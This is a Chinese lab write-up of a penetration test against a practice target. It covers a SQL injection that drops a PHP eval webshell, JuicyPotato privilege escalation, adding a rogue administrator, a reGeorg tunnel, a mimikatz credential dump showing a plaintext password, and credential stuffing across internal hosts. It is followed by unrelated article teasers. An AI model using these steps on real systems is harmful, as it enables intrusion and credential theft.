“辛巴猫舍”内网渗透、提权、撞库学习笔记

前言:

在拿到靶机时,我们最先需要做的是信息收集,包括不限于:C段扫描,端口探测,指纹识别,版本探测等。其次就是 漏洞挖掘、漏洞利用、提权、维持权限、日志清理、留下后门。
以上就是渗透的基本流程。

这里以“辛巴猫舍”为靶机,开展一次由外到内的渗透。

正文:

1、SQL注入

在URL中输入

http://gognj2dm.aqlab.cn/?id=1%20and%201=2

后报错了,并回显了路径。证明存在SQL注入漏洞,于是进一步进行测试。
在这里插入图片描述
我们通过可以通过into dumpfile指令将webshell写入服务器,在浏览器URL输入命令如下:

http://gognj2dm.aqlab.cn/?id=1 union select 1,'<?php eval($_REQUEST[8])?>' into dumpfile 'C:/phpStudy/WWW/r.php'

该语句的意思是:通过联合查询,在数据库中查询数据1<?php eval($_REQUEST[8]) ?>,并将结果导出到C:/phpStudy/WWW/中的r.php文件中

  • <?php eval($_REQUEST[8]) ?>是字符串,所以要加单引号
  • 绝对路径中用反斜杠
  • into dumpfile后面的路径也需要加上单引号,因为这是一个文件

2、路径访问

用蚁键访问路径

http://gognj2dm.aqlab.cn/r.php

在这里插入图片描述

3、用户提权

进入服务器之后,运行cmd,输入whoami,获得自己的用户为test
在这里插入图片描述
在这里插入图片描述
输入net user 查看用户情况
在这里插入图片描述
输入net localgroup administrators查看管理员用户组,发现没有test
在这里插入图片描述
输入systeminfo发现目标服务器的系统为Microsoft Windows Server 2008 R2 Standard ,内网的IP地址为:10.0.1.4
在这里插入图片描述
为了远程该IP,我们就需要提权,使得自己可以完全的控制目标服务器。
可以从补丁层面远程渗透,但这里不展开讲。
在这里插入图片描述

把烂土豆、猕猴桃程序通过蚁剑上传到目标服务器,烂土豆程序上传前先改名为re.exe,然后终端输入指令:re.exe -p “whoami”,获得系统权限。
在这里插入图片描述
在这里插入图片描述
为了远程靶机服务器,需要自己建立一个用户,然后看对方是否开启3389。

通过输入命令:

re.exe -p “net user xxx a1s2d3-+ /add”

创建用户xxx。
接着,赋予xxx系统用户权限:r

e.exe -p “net localgroup administrators xxx /add”

可以通过net user验证一下是否建立成功
在这里插入图片描述

通过系统命令查看是否开启3389端口:re.exe -p “net -ano”,发现确实开始3389

4、远程连接

通过mstsc远程桌面连接,发现是windows server 2003 R2的机器,和目标主机不一致。
原因是我们访问的网站:http://gognj2dm.aqlab.cn对应IP59.63.166.70的3389端口不是目标服务器的端口,59.63.166.70:3389映射了该2003R2的服务器的3389端口,那么我们如果要访问目标靶机的3389的话,可以使用内网的其他服务器来进行访问

5、隧道搭建

将reGeorg中的tunnel.php通过蚁剑传入目标服务器,改名为333.php
在这里插入图片描述
然后在URL中输入一下,看有没有回显
在这里插入图片描述
下面使用命令开启代理regeorg程序,此脚本为python2开发的脚本,使用需要安装python2运行,命令为:

python reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://gognj2dm.aqlab.cn/333.php
  • -p 设置10086监听端口
  • -l设置本地监听地址
  • -u 设置目标来源

这里我卡了好就,因为这个脚本需要python 2的第三方库,下了半天没下载好,最后在朋友的帮助下解决了。

接着在本地电脑安装proxifier汉化版,设置代理规则,设置为本地mstsc.exe程序产生的通信数据通过127.0.0.1:10086端口进行传输
在这里插入图片描述
在这里插入图片描述
打开本地mstsc远程桌面,连接的服务器改为上面我们获取到的内网地址10.0.1.4,输入我们设置的账号密码,进入目标服务器的远程桌面
在这里插入图片描述

5、提权及撞库

在目标服务器上,管理员权限运行猕猴桃程序。
请添加图片描述
输入log开启日志,输入privilege::debug进行提权,输入sekurlsa::logonpasswords抓取登录该主机的用户名及密码。发现管理员组用户名:administrator,密码:woshifengge11.
在这里插入图片描述
然后在本地cmd中,输入 arp-a 对内网IP信息进行收集
请添加图片描述
通过简单的内网ip收集得到10.0.1.1、10.0.1.3、10.0.1.5、10.0.1.6、10.0.1.8五个ip,由此依次尝试撞库。

最后终于在10.0.1.8IP成功登录。得到我们里面放的flag。

请添加图片描述

参考文献

  1. 记一次猫舍由外到内的渗透撞库操作提取-flag ↩︎

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/189488.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Autosar UDS开发01(UDS诊断入门概念(UDSOnCan))

Autosar UDS开发01(UDS诊断入门概念(UDSOnCan))

目录 回顾接触UDS的过程 UDS基本概念 UDS的作用 UDS的宏观认识 UDS的CAN通讯链路 UDS的报文种类 回顾接触UDS的过程 自21年毕业后&#xff0c;我一直干了2年的Autosar CAN通讯开发。 开发的主要内容简单概括就是&#xff1a;应用报文开发、网管报文开发、休眠唤醒开发&am…
阅读更多...
【PostgreSql本地备份为dump文件与恢复】使用脚本一键备份为dump文件

【PostgreSql本地备份为dump文件与恢复】使用脚本一键备份为dump文件

环境&#xff1a;windows数据库&#xff1a;postgresql 1.准备脚本 backUpDb.bat 脚本为备份脚本&#xff0c;双击运行&#xff0c;右键可以选择编辑&#xff1b;restoreDb.bat 脚本为恢复脚本&#xff0c;双击运行&#xff0c;右键选择编辑&#xff1b; 1.1 脚本介绍 如上图…
阅读更多...
docker更改存储目录原因及方案

docker更改存储目录原因及方案

为什么一定要将docker的存储目录挂载到其他目录 docker在安装时默认存储目录在/var/lib/docker&#xff0c;而该目录是在系统盘下的。docker安装后&#xff0c;会使用各种各样的镜像&#xff0c;动辄几个G&#xff0c;那么如此多的镜像文件&#xff0c;装着装着系统盘就撑爆了…
阅读更多...
【mysql】将逗号分割的字段内容转换为多行并group by

【mysql】将逗号分割的字段内容转换为多行并group by

先说需求&#xff1a; 公司想让我通过mysql导出一个报表&#xff0c;内容为公司每个人参加会议的次数&#xff0c;现在有一个会议表fusion_meeting&#xff0c;正常的逻辑是通过人员直接group by就可以得出结果&#xff0c;但是我们的参会人是通过逗号分割这种方式存在一个字段…
阅读更多...
网络原理-UDP/TCP详解

网络原理-UDP/TCP详解

一. UDP协议 UDP协议端格式 由上图可以看出&#xff0c;一个UDP报文最大长度就是65535. • 16位长度&#xff0c;表示整个数据报&#xff08;UDP首部UDP数据&#xff09;的最大长度&#xff08;注意&#xff0c;这里的16位UDP长度只是一个标识这个数据报长度的字段&#xff0…
阅读更多...
银河麒麟等 Linux系统 安装 .net 3.1,net 6及更高版本的方法

银河麒麟等 Linux系统 安装 .net 3.1,net 6及更高版本的方法

确定 系统的版本。华为鲲鹏处理器是 Arm64位的。 于是到windows 官网下载对应版本 .net sdk 下载地址 https://dotnet.microsoft.com/zh-cn/download/dotnet 2.下载完成后&#xff0c;再linux 服务器 上进入到文件所在目录&#xff0c;建议全英文路径。 然后依次输入以下命令 …
阅读更多...
基于 Gin 的 HTTP 代理 demo

基于 Gin 的 HTTP 代理 demo

上次用 TCP 模拟了一个 HTTP 代理之后&#xff0c;感觉那样还是太简陋了&#xff0c;想着是不是可以用框架来做一个有点实际用处的东西。所以&#xff0c;就思索如何用 golang 的 Gin 框架来实现一个&#xff1f;嗯&#xff0c;对的你没有听错&#xff0c;是 gin 框架。你可能会…
阅读更多...
Javaweb之javascript的小案例的详细解析

Javaweb之javascript的小案例的详细解析

1.5.4 案例 1.5.4.1 需求说明 鲁迅说的好&#xff0c;光说不练假把式,光练不说傻把式。所以接下来我们需要通过案例来加强对于上述DOM知识的掌握。需求如下3个&#xff1a; 点亮灯泡 将所有的div标签的标签体内容后面加上&#xff1a;very good 使所有的复选框呈现被选中的…
阅读更多...
【原型详解】JavaScript原型链:深入了解Prototype,超级详细!!!

【原型详解】JavaScript原型链:深入了解Prototype,超级详细!!!

&#x1f601; 作者简介&#xff1a;一名大四的学生&#xff0c;致力学习前端开发技术 ⭐️个人主页&#xff1a;夜宵饽饽的主页 ❔ 系列专栏&#xff1a;JavaScript进阶指南 &#x1f450;学习格言&#xff1a;成功不是终点&#xff0c;失败也并非末日&#xff0c;最重要的是继…
阅读更多...
1.docker linux离线环境安装 20.1.0.12

1.docker linux离线环境安装 20.1.0.12

目录 概述下载解压docker 卸载docker 安装检查安装环境常用命令结束 概述 docker离线环境安装 20.1.0.12 , centos 7.x 下载 安装包下载 解压 [roothadoop01 soft]# unzip docker_20_1_0_12.zip [roothadoop01 soft]# cd docker_20_1_0_12 [roothadoop01 docker_20_1_0_1…
阅读更多...
如何在 Idea 中修改文件的字符集(如:UTF-8)

如何在 Idea 中修改文件的字符集(如:UTF-8)

以 IntelliJ IDEA 2023.2 (Ultimate Edition) 为例&#xff0c;如下&#xff1a; 点击左上角【IntelliJ IDEA】->【Settings…】&#xff0c;如下图&#xff1a; 从弹出页面的左侧导航中找到【Editor】->【File Encodings】&#xff0c;并将 Global Encoding、Project E…
阅读更多...
2352 智能社区医院管理系统JSP【程序源码+文档+调试运行】

2352 智能社区医院管理系统JSP【程序源码+文档+调试运行】

摘要 本文介绍了一个智能社区医院管理系统的设计和实现。该系统包括管理员、护工和医生三种用户&#xff0c;具有社区资料管理、药品管理、挂号管理和系统管理等功能。通过数据库设计和界面设计&#xff0c;实现了用户友好的操作体验和数据管理。经过测试和优化&#xff0c;系…
阅读更多...
.net在使用存储过程中IN参数的拼接方案,使用Join()方法

.net在使用存储过程中IN参数的拼接方案,使用Join()方法

有时候拼接SQL语句时&#xff0c;可能会需要将list中的元素都加上单引号&#xff0c;并以逗号分开&#xff0c;但是Join只能简单的分开&#xff0c;没有有单引号&#xff01; 1.第一种拼接方案 List<string> arrIds new List<string>(); arrIds.Add("aa&qu…
阅读更多...
Spring -Spring之依赖注入源码解析(下)--实践(流程图)

Spring -Spring之依赖注入源码解析(下)--实践(流程图)

IOC依赖注入流程图 Autowired&#xff1a;注入的顺序及优先级&#xff1a;type-->Qualifier-->Primary-->PriOriry-->name Resource&#xff1a;先通过Resource上指定的byName进行注入&#xff0c;若byName没找到&#xff0c;则与Autowired注入方式相同&#xff…
阅读更多...
Django(一、简介,安装与使用)

Django(一、简介,安装与使用)

文章目录 一、Django引入1.web应用程序什么是web&#xff1f;web引用程序的优点web应用程序的缺点什么是web框架 2.纯手写web框架1.web框架的本质2.HTTP协议的特性&#xff1a;3.编写基于wsgire模块搭建web框架代码封装优化代码封装 二、Django框架的学习1.Python中的主流框架2…
阅读更多...
Vue中的常用指令v-html / v-show / v-if / v-else / v-on / v-bind / v-for / v-model

Vue中的常用指令v-html / v-show / v-if / v-else / v-on / v-bind / v-for / v-model

前言 持续学习总结输出中&#xff0c;Vue中的常用指令v-html / v-show / v-if / v-else / v-on / v-bind / v-for / v-model 概念&#xff1a;指令&#xff08;Directives&#xff09;是Vue提供的带有 v- 前缀 的特殊标签属性。可以提高操作 DOM 的效率。 vue 中的指令按照不…
阅读更多...
京东数据分析:2023年10月京东洗衣机行业品牌销售排行榜

京东数据分析:2023年10月京东洗衣机行业品牌销售排行榜

鲸参谋监测的京东平台10月份洗衣机市场销售数据已出炉&#xff01; 10月份&#xff0c;洗衣机市场整体销售呈上升走势。鲸参谋数据显示&#xff0c;今年10月&#xff0c;京东平台洗衣机市场的销量为143万&#xff0c;环比增长约23%&#xff0c;同比增长约1%&#xff1b;销售额约…
阅读更多...
有源RS低通滤波

有源RS低通滤波

常用的滤波电路有无源滤波和有源滤波两大类。若滤波电路元件仅由无源元件&#xff08;电阻、电容、电感&#xff09;组成&#xff0c;则称为无源滤波电路。无源滤波的主要形式有电容滤波、电感滤波和复式滤波(包括倒L型、LC滤波、LCπ型滤波和RCπ型滤波等)。若滤波电路不仅有无…
阅读更多...
c语言:用指针解决有关字符串等问题

c语言:用指针解决有关字符串等问题

题目1&#xff1a;将一个字符串str的内容颠倒过来&#xff0c;并输出。 数据范围&#xff1a;1≤len(str)≤10000 代码和思路&#xff1a; #include <stdio.h> #include<string.h> int main() {char str1[10000];gets(str1);//读取字符串内容char* p&str1[…
阅读更多...
Git版本控制系统之分支与标签(版本)

Git版本控制系统之分支与标签(版本)

目录 一、Git分支&#xff08;Branch&#xff09; 1.1 分支作用 1.2 四种分支管理策略 1.3 使用案例 1.3.1 指令 1.3.2 结合应用场景使用 二、Git标签&#xff08;Tag&#xff09; 2.1 标签作用 2.2 标签规范 2.3 使用案例 2.3.1 指令 2.3.2 使用示例 一、Git分支&…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023